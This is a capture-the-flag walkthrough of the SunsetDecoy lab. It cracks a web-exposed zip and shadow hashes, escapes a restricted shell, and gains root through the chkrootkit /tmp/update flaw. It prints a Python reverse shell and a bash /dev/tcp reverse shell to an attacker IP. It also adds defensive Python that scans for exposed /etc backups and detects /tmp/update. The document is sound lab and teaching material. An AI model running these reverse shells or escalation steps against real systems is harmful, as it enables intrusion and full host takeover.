# SunsetDecoy

## Nmap

```
sudo nmap 192.168.184.85 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First, browsing to the root page on port 80 takes us to a directory index containing a file called save.zip.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-99afb3fbd68b52e6d87e74e200f1be9dfb6224dc%2Fimage.png?alt=media)

Upon downloading the file we are asked for a password to open it. Kali comes pre-installed with a `John` helper called `zip2john`. We can use this to produce a hash of the archive that `John` can then crack.

```
/usr/sbin/zip2john /home/kali/Downloads/save.zip > /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9485556de05f36efc890383a43fecab298323b0%2Fimage.png?alt=media)

We can then run `John` against the hash.

```
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fb9bbf6df6e397064fc7438a974f648be12d7fb6%2Fimage.png?alt=media)

We soon get the password `manuel`. We can then extract the contents of save.zip, which gives us an /etc/ folder.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-019bcc64f90e5a32f11b11f18dbf34c0060ec43d%2Fimage.png?alt=media)

Of these files, shadow is the most interesting.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-66193a3e6bc17a9f402801f32e1f4b21d0d2c7f7%2Fimage.png?alt=media)
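The exposed archive is the real finding here: a backup of /etc sitting on a public web root, protected only by a weak zip password. The following is an added example (not code from the original write-up) of the check a defender would run over a web root: it lists zip archives whose entries match sensitive paths. The file list of a zip is readable without the password, so even a password-protected backup reveals that it contains etc/shadow. The sample archive, the pattern list and the function names are this example's own.

```python
"""Scan a web root for archives that expose sensitive files.

Added example, not part of the original write-up. Archive entry names are
read without supplying any password; only the entry content is encrypted.
"""
import os
import re
import tempfile
import zipfile

# Archive entries that should never sit on a public web root (example list).
SENSITIVE_PATTERNS = [
    re.compile(r"(^|/)etc/shadow$"),
    re.compile(r"(^|/)etc/gshadow$"),
    re.compile(r"(^|/)etc/passwd$"),
    re.compile(r"(^|/)\.ssh/(id_rsa|id_ed25519|authorized_keys)$"),
    re.compile(r"(^|/)\.bash_history$"),
]


def sensitive_entries(zip_path):
    """Return (entry_name, content_encrypted) for sensitive entries in one archive.

    Bit 0 of the general-purpose flag word marks a password-protected entry,
    which is what the walkthrough ran into; the name is visible regardless.
    """
    hits = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if any(p.search(info.filename) for p in SENSITIVE_PATTERNS):
                hits.append((info.filename, bool(info.flag_bits & 0x1)))
    return hits


def scan_webroot(root):
    """Walk a directory tree and map each archive path to its sensitive entries."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            if not zipfile.is_zipfile(path):
                continue
            hits = sensitive_entries(path)
            if hits:
                findings[path] = hits
    return findings


def build_sample_archive(path):
    """Constructed sample: a 'save.zip' holding an etc/ folder with placeholder data."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("etc/hostname", "decoy\n")
        zf.writestr("etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        zf.writestr("etc/shadow", "root:$6$PLACEHOLDER$PLACEHOLDER:18000:0:99999:7:::\n")
    return path


def demo():
    """Build the sample web root in a temp dir and return what the scan finds."""
    with tempfile.TemporaryDirectory() as webroot:
        archive = build_sample_archive(os.path.join(webroot, "save.zip"))
        findings = scan_webroot(webroot)
        names = sorted(name for name, _ in findings.get(archive, []))
        encrypted = [enc for _, enc in findings.get(archive, [])]
        return names, encrypted, len(findings)


if __name__ == "__main__":
    names, encrypted, count = demo()
    print(f"{count} archive(s) with sensitive entries: {names}")
```

Python's `zipfile` cannot write encrypted archives, so the sample's entries report `content_encrypted=False`; against the real save.zip the names would still be listed and the flag would be set. Run it against a document root with `scan_webroot("/var/www/html")`.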

We have password hashes for the root account and for the account `296640a3b825115a47b68fc44501c828`. I was unable to crack the root password with a wordlist, but the other account's hash cracked as below:

```
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35f905c0d132d45869a32b7e9e1f7cd1febf31b7%2Fimage.png?alt=media)

We now have the password `server`. I was then able to log in over `SSH` with this username and password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-493231297a2e0d7d434f2cf01cf13dd3ae6c1f4b%2Fimage.png?alt=media)

When attempting to run a simple command such as `cat` we are given the error message: `-rbash: cat: command not found`.

To get around the restricted shell we can exit out of SSH and reconnect with the following command, which requests a normal bash without loading the profile:

```
ssh 296640a3b825115a47b68fc44501c828@192.168.184.85 -t "bash --noprofile"
```

Once in, we have a more usable shell. We can then run a Python reverse shell to open a second connection, which gives us a shell that is easier to work with.

```
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.184",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

Once in the new shell, set a new PATH so that the standard commands can be run without their full paths.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5b9faa856dc34ed785a048f8bead64db9de83200%2Fimage.png?alt=media)

After enumerating the machine for a while I was unable to find any privilege escalation path. I then transferred over [pspy64](https://github.com/DominicBreuker/pspy/releases) and let it run.

```
chmod +x pspy64
./pspy64
```

Soon after running it we see a large number of entries for chkrootkit-0.49.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2aa9390f32f8a7f97ae1201d8496af26dba58a08%2Fimage.png?alt=media)

A quick search shows a local privilege escalation affecting this version and earlier:

<https://www.exploit-db.com/exploits/33899>

Essentially, chkrootkit will execute the file /tmp/update if it exists. We can create /tmp/update as a reverse shell, and when chkrootkit next runs it should give us a root shell.

```
echo '#!/bin/bash
bash -i >& /dev/tcp/192.168.49.184/80 0>&1' > /tmp/update
```

Make it executable:

```
chmod +x /tmp/update
```

Then open a `netcat` listener on the specified port and we should land a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1554680ff633b84cd9dd2caac6798de6e41fb436%2Fimage.png?alt=media)
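From the defender's side, the precondition for this escalation is simple to watch for: a file named update in /tmp on a host running an old chkrootkit. The following is an added example (not code from the original write-up or from chkrootkit) of a check a monitoring job could run. It reports whether /tmp/update exists, whether it is executable, world-writable or a symlink, and whether a chkrootkit version string falls in the range the linked advisory describes (0.49 and earlier). The temporary-directory parameter, the version helper and the constructed scenario in `demo()` are this example's own.

```python
"""Detection check for the chkrootkit /tmp/update condition.

Added example, not part of the original write-up. Nothing legitimate should
create /tmp/update, so any hit is worth an alert; the extra fields help
triage it.
"""
import os
import stat
import tempfile


def chkrootkit_affected(version):
    """True if a dotted version string is 0.49 or lower (range from the advisory)."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts <= (0, 49)


def check_tmp_update(tmp_dir="/tmp"):
    """Describe tmp_dir/update if it exists, else return None.

    lstat is used so that a symlink planted in /tmp is reported as such rather
    than followed to its target.
    """
    path = os.path.join(tmp_dir, "update")
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    mode = st.st_mode
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "owned_by_root": st.st_uid == 0,
        "is_symlink": stat.S_ISLNK(mode),
        "executable": bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
        "world_writable": bool(mode & stat.S_IWOTH),
    }


def demo():
    """Constructed scenario: an 'update' file appears in an empty temp directory.

    Returns (report_before, report_after): None before the file exists, then
    the dict describing the executable file that was planted.
    """
    with tempfile.TemporaryDirectory() as tmp:
        before = check_tmp_update(tmp)
        path = os.path.join(tmp, "update")
        with open(path, "w") as fh:
            fh.write("placeholder\n")  # constructed content, not a real payload
        os.chmod(path, 0o755)
        after = check_tmp_update(tmp)
    return before, after


if __name__ == "__main__":
    for v in ("0.48", "0.49", "0.50"):
        print(f"chkrootkit {v}: affected={chkrootkit_affected(v)}")
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

On a real host, schedule `check_tmp_update()` to run shortly before the chkrootkit cron job and alert on any non-None result; the process listing the write-up obtained with pspy is the other place this shows up, as a root-owned process whose command line is /tmp/update.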
